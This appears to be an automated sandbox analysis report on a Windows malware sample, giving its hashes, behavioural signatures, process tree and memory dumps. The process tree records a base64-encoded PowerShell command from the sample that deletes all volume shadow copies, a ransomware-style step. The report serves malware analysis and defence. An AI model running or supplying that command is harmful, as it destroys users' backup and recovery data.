Analysis
-
max time kernel
121s -
max time network
147s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
24-01-2022 02:13
Static task
static1
Behavioral task
behavioral1
Sample
3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
Resource
win10-en-20211208
General
-
Target
3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
-
Size
168KB
-
MD5
4055b029169ab30c5408bd0ab527a8ae
-
SHA1
a410032d78bbc13f8b32ed0f38f6208081518bc6
-
SHA256
3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac
-
SHA512
dfb91472802e5b27c37861e3ebfc88a4b078dd2f123e06bd3541c53631fbded949fb3a3f8953341d8cffcf9ee0d1b02013a7ea2b02a7dd755ab57b91ab87caec
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exedescription ioc process File opened (read-only) \??\F: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\L: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\S: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\Z: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\E: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\H: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\X: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\V: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\Y: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\I: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\J: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\M: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\Q: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\N: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\O: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\P: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\R: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\A: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\B: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\G: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\K: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\T: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\U: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe File opened (read-only) \??\W: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exepowershell.exepid process 656 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe 656 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe 960 powershell.exe 960 powershell.exe 960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 960 powershell.exe Token: SeBackupPrivilege 2460 vssvc.exe Token: SeRestorePrivilege 2460 vssvc.exe Token: SeAuditPrivilege 2460 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exedescription pid process target process PID 656 wrote to memory of 960 656 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe powershell.exe PID 656 wrote to memory of 960 656 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe"C:\Users\Admin\AppData\Local\Temp\3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe"1⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/960-121-0x0000025ADCA10000-0x0000025ADCA32000-memory.dmpFilesize
136KB
-
memory/960-126-0x0000025ADECD0000-0x0000025ADED46000-memory.dmpFilesize
472KB
-
memory/960-133-0x0000025AC4930000-0x0000025ADCA80000-memory.dmpFilesize
385.3MB
-
memory/960-136-0x0000025AC4930000-0x0000025ADCA80000-memory.dmpFilesize
385.3MB
-
memory/960-140-0x0000025AC4930000-0x0000025ADCA80000-memory.dmpFilesize
385.3MB